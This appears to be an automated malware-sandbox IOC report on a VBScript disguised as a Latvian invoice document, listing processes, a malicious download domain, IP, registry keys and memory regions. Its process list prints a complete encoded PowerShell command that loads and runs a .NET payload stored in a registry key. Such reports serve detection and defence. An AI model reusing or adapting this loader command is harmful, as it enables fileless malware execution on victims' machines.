IOC Report
nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs

loading gif

Files

File Path
Type
Category
Malicious
nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs
ASCII text, with very long lines (35174), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12t2j1hg.zvy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lged3gvc.qj3.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"

URLs

Name
IP
Malicious
http://transfer.adttemp.com.br
unknown
malicious
https://transfer.adttemp.com.br
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://transfer.adttemp.com.br/qcExh/99gram.txt
104.196.109.209
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
https://github.com/Pester/Pester
unknown
There are 5 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
transfer.adttemp.com.br
104.196.109.209

IPs

IP
Domain
Country
Malicious
104.196.109.209
transfer.adttemp.com.br
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\NYANxCAT
NYANxCAT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1A9C3610000
trusted library section
page read and write
malicious
1A9BB668000
trusted library allocation
page read and write
malicious
1A9AB530000
trusted library allocation
page read and write
1B4F023F000
heap
page read and write
1B4F01DF000
heap
page read and write
1B4EE3E5000
heap
page read and write
1B4F0072000
heap
page read and write
1B4F0072000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
1B4EE3EE000
heap
page read and write
1B4F00C5000
heap
page read and write
1B4F008A000
heap
page read and write
1B4F02DA000
heap
page read and write
7FF848E1C000
trusted library allocation
page execute and read and write
7FF848F20000
trusted library allocation
page execute and read and write
1B4F0064000
heap
page read and write
1A9AD3B5000
trusted library allocation
page read and write
1B4F025E000
heap
page read and write
1B4F0201000
heap
page read and write
1A9AD1D4000
trusted library allocation
page read and write
1A9AB4A0000
heap
page read and write
1A9A93DF000
heap
page read and write
33FD33B000
stack
page read and write
1A9C3630000
heap
page read and write
7FF848D84000
trusted library allocation
page read and write
33FCD7D000
stack
page read and write
1B4F0052000
heap
page read and write
1A9AB320000
heap
page execute and read and write
7FF848F1A000
trusted library allocation
page read and write
1A9A95E0000
heap
page execute and read and write
1B4EE33F000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
33FD23F000
stack
page read and write
1A9AD23E000
trusted library allocation
page read and write
1B4F01E0000
heap
page read and write
1A9BBC01000
trusted library allocation
page read and write
7FF848E46000
trusted library allocation
page execute and read and write
41BC8FE000
stack
page read and write
1B4F00C5000
heap
page read and write
1A9AD979000
trusted library allocation
page read and write
1A9C35B0000
heap
page execute and read and write
1B4F023F000
heap
page read and write
1B4F0065000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
1A9AADE0000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
7FF848D60000
trusted library allocation
page read and write
1A9A9580000
trusted library allocation
page read and write
1A9BB4B1000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
1B4F0092000
heap
page read and write
41BD0FF000
stack
page read and write
1B4F00A4000
heap
page read and write
1A9AB330000
heap
page read and write
1B4F0073000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page execute and read and write
7FF848E10000
trusted library allocation
page read and write
7FF848D70000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
1A9A9330000
heap
page read and write
1B4F0050000
heap
page read and write
1B4F01E6000
heap
page read and write
1B4EE300000
heap
page read and write
1A9AB4A9000
heap
page read and write
1B4EE3D4000
heap
page read and write
1A9BB7DB000
trusted library allocation
page read and write
1A9BB4C0000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
1B4F0053000
heap
page read and write
7FF848D7B000
trusted library allocation
page read and write
1B4EE250000
heap
page read and write
7FF848D63000
trusted library allocation
page execute and read and write
7FF8490D0000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
1A9C35D0000
trusted library allocation
page read and write
1B4EE3F9000
heap
page read and write
1B4EE390000
heap
page read and write
1A9A9471000
heap
page read and write
1A9A9370000
heap
page read and write
1A9C375F000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
1B4EE230000
heap
page read and write
1A9A95C0000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
33FDD8E000
stack
page read and write
7FF849010000
trusted library allocation
page read and write
1B4F0208000
heap
page read and write
1B4EE5F5000
heap
page read and write
1A9A95A0000
trusted library allocation
page read and write
1B4F0054000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
1B4F00C5000
heap
page read and write
1A9A93E7000
heap
page read and write
1B4F01BC000
heap
page read and write
33FDCC2000
stack
page read and write
1A9A95B0000
heap
page readonly
1B4F045E000
heap
page read and write
1A9AD97C000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
1B4EE336000
heap
page read and write
1B4F0081000
heap
page read and write
1B4F015E000
heap
page read and write
33FDE0D000
stack
page read and write
41BCAFF000
stack
page read and write
33FCCFF000
stack
page read and write
1A9C3710000
heap
page read and write
1B4F0251000
heap
page read and write
41BCFFB000
stack
page read and write
1B4EE330000
heap
page read and write
1B4EE3F8000
heap
page read and write
7FF848D6D000
trusted library allocation
page execute and read and write
7FF848F11000
trusted library allocation
page read and write
1B4EE39D000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
1A9A93A0000
heap
page read and write
1A9C34D0000
heap
page read and write
1B4EE3FC000
heap
page read and write
1A9AB327000
heap
page execute and read and write
7FF849180000
trusted library allocation
page read and write
1A9AB3E0000
heap
page read and write
1B4F0062000
heap
page read and write
1A9AB4B1000
trusted library allocation
page read and write
1B4F0450000
heap
page read and write
1A9C3747000
heap
page read and write
33FDE89000
stack
page read and write
1B4EE32C000
heap
page read and write
7FF848D80000
trusted library allocation
page read and write
41BCDFD000
stack
page read and write
1A9AD0F3000
trusted library allocation
page read and write
7FF848D8D000
trusted library allocation
page execute and read and write
41BC7FE000
stack
page read and write
1A9C3A00000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1B4F020F000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
1A9AB37A000
heap
page read and write
1B4F01BB000
heap
page read and write
1B4EE346000
heap
page read and write
41BCCFE000
stack
page read and write
33FCEFE000
stack
page read and write
1A9A9570000
trusted library section
page read and write
1B4F00B5000
heap
page read and write
1A9AAF85000
heap
page read and write
1B4EE3FE000
heap
page read and write
1B4F0494000
heap
page read and write
1B4EE34D000
heap
page read and write
1B4F01E5000
heap
page read and write
1B4EE32B000
heap
page read and write
1A9AD1BA000
trusted library allocation
page read and write
1B4EFD00000
heap
page read and write
33FDF8A000
stack
page read and write
1A9A9600000
heap
page read and write
1A9A9427000
heap
page read and write
1A9A9605000
heap
page read and write
1B4F01FC000
heap
page read and write
33FDD0F000
stack
page read and write
1B4EE39D000
heap
page read and write
7FF848D8B000
trusted library allocation
page execute and read and write
7FF849000000
trusted library allocation
page read and write
1A9AB3AD000
heap
page read and write
1A9ABEAA000
trusted library allocation
page read and write
1B4F0495000
heap
page read and write
1B4F01EC000
heap
page read and write
1B4F02DB000
heap
page read and write
1A9A9300000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
1A9C36C0000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
1B4F01FC000
heap
page read and write
7FF848DBC000
trusted library allocation
page execute and read and write
1B4EE3DE000
heap
page read and write
1B4F0081000
heap
page read and write
1B4EE336000
heap
page read and write
1B4F007A000
heap
page read and write
7FF848E16000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page execute and read and write
1A9A9310000
heap
page read and write
1B4F0250000
heap
page read and write
1B4EE32F000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
1A9A93E9000
heap
page read and write
1A9C3758000
heap
page read and write
1B4F0073000
heap
page read and write
1A9BB520000
trusted library allocation
page read and write
1B4F01FC000
heap
page read and write
1A9A93FF000
heap
page read and write
1A9BBC39000
trusted library allocation
page read and write
1B4F0062000
heap
page read and write
1A9ACC03000
trusted library allocation
page read and write
1B4EE150000
heap
page read and write
41BCEFE000
stack
page read and write
1A9C35D3000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
1A9AAF80000
heap
page read and write
1A9AB41D000
heap
page read and write
1B4F01DE000
heap
page read and write
7DF4CDF40000
trusted library allocation
page execute and read and write
1B4F0218000
heap
page read and write
1B4F0051000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
1B4EE384000
heap
page read and write
33FCDFF000
stack
page read and write
1B4F0150000
heap
page read and write
1B4F02A3000
heap
page read and write
1A9AC9BD000
trusted library allocation
page read and write
1A9A93EB000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
1A9AB661000
trusted library allocation
page read and write
1A9AAE28000
heap
page read and write
33FC8D3000
stack
page read and write
1A9AD334000
trusted library allocation
page read and write
1B4EE3D7000
heap
page read and write
1B4EE336000
heap
page read and write
1B4F0052000
heap
page read and write
1A9C36B0000
heap
page read and write
1A9AB3F0000
heap
page read and write
1A9AD215000
trusted library allocation
page read and write
1A9AD83D000
trusted library allocation
page read and write
1A9AD0D9000
trusted library allocation
page read and write
1B4F0451000
heap
page read and write
1A9ABFBD000
trusted library allocation
page read and write
1A9A9390000
trusted library section
page read and write
41BC6DA000
stack
page read and write
7FF848F42000
trusted library allocation
page read and write
1A9AD105000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
1A9AD988000
trusted library allocation
page read and write
1A9AB33B000
heap
page read and write
1A9A942C000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
7FF848D64000
trusted library allocation
page read and write
1B4EE5F0000
heap
page read and write
1B4F0073000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
1A9AD101000
trusted library allocation
page read and write
1B4F01FC000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
33FCE7E000
stack
page read and write
7FF848F70000
trusted library allocation
page read and write
1B4F023F000
heap
page read and write
1B4F0092000
heap
page read and write
1B4EE3F8000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
1A9BB53C000
trusted library allocation
page read and write
There are 241 hidden memdumps, click here to show them.